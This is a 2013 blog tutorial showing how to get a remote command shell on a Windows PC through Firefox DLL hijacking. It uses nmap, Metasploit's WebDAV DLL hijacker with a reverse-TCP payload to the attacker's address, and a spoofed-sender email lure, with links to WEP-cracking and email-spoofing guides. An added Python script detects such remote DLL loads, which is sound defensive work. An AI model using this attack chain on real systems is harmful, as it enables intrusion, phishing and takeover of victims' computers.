
Hacking Windows with Firefox DLL hijacking.

"DLL hijacking" is one of the most popular hacking methods that abuses browsers or archive tools running on target PCs.
This is a way to get a command prompt on a target PC running Windows (8, 7 or older). I tested it in my lab environment. Do NOT try this method anywhere other than your own environment.

Let's start.

BackTrack 5 R3 should be installed on the attacker's PC.
(See http://www.ddhost.jp/lab/2013/05/backtrack5.html to install BackTrack 5 R3.)

First, the attacker's PC must be connected to the same network segment as the target PC.
See http://www.ddhost.jp/lab/2013/05/lanwep.html to connect via Wi-Fi with WEP cracking.
Now the attacker can communicate with the target PC.

The attacker can find the network address of the segment.
Type "ifconfig". The network address is "192.168.11.0/24" in the sample below.
The attacker's PC got "192.168.11.3" from a DHCP server.

Then type "nmap -n -sP 192.168.11.0/24".
This lists all live hosts on the segment.
In the sample below:
- 192.168.11.1 - Buffalo (Broadband Router)
- 192.168.11.2 - PC (target)
- 192.168.11.3 - PC (attacker)

Type "nmap 192.168.11.2" to get more information about the target PC.
It is probably a Windows machine because TCP port 445 is open.

Run "msfconsole" to start the Metasploit Framework.

Type
- "use exploit/windows/browser/webdav_dll_hijacker"
- "set EXTENSIONS html"
- "set BASENAME readme"
- "set PAYLOAD windows/shell/reverse_tcp"
- "set LHOST 192.168.11.3" (Change this to the attacker's IP address.)

Run "exploit" to start the exploit.


The target PC must access "\\192.168.11.3\documents\" via WebDAV.
The attacker sends the path in an e-mail from a fake address (e.g. one of the target's friends).
See http://www.ddhost.jp/lab/2013/05/from_header.html to send an e-mail from a fake address.

Then the owner of the target PC reads the e-mail and accesses the path.
The owner finds "readme.html" and opens it with Firefox 3.6.8.

A few minutes later, the message "Command shell session 1 opened" appears on the console.

Type "sessions -i 1" to get a command prompt on the target PC.

Now the attacker can run commands on the target PC.

For example, the attacker can run "calc.exe" on the target PC.
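A defender-side check to go with the walkthrough above, added here and not part of the original post: it scans constructed Sysmon-style Event ID 7 (image loaded) records for DLLs that a process resolved from a remote UNC or WebDAV path, which is the load this technique depends on when the document is opened from "\\192.168.11.3\documents\". The field names follow Sysmon; the records themselves are made up, reuse the post's sample address, and the DLL name is a placeholder.

```python
from pathlib import PureWindowsPath

# Constructed sample records modelled on Sysmon Event ID 7 (image loaded).
# They are NOT captured data: Image is the loading process, ImageLoaded the DLL.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll", "Signed": "true"},
    # DLL resolved from the WebDAV share the document was opened from
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ImageLoaded": r"\\192.168.11.3\documents\example.dll", "Signed": "false"},
    # same share reached through the WebDAV mini-redirector path form
    {"Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "ImageLoaded": r"\\192.168.11.3@80\DavWWWRoot\documents\example.dll",
     "Signed": "false"},
    {"Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\shell32.dll", "Signed": "true"},
]


def is_remote_dll_load(image_loaded):
    """True when the DLL path is a UNC share (including the \\\\?\\UNC\\ form)
    or contains the WebDAV redirector marker DavWWWRoot.

    Limitation: a WebDAV share mapped to a drive letter (Z:\\...) looks local
    here and needs a drive-mapping lookup to classify.
    """
    parts = image_loaded.split("\\")
    return image_loaded.startswith("\\\\") or "DavWWWRoot" in parts


def find_remote_dll_loads(events):
    """Return one hit per event whose DLL came from a remote path."""
    hits = []
    for ev in events:
        if is_remote_dll_load(ev["ImageLoaded"]):
            hits.append({
                "process": PureWindowsPath(ev["Image"]).name,
                "dll": ev["ImageLoaded"],
                "signed": ev.get("Signed", "").lower() == "true",
            })
    return hits


if __name__ == "__main__":
    for hit in find_remote_dll_loads(SAMPLE_EVENTS):
        flag = "signed" if hit["signed"] else "UNSIGNED"
        print(f"{hit['process']} loaded {flag} DLL from remote path: {hit['dll']}")
```

An unsigned DLL loaded by a browser or document handler from a remote share is the pattern to alert on; a signed one from the same location still warrants a look at why the search order reached that directory.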

This entry was posted on 2013-08-20 at 22:00.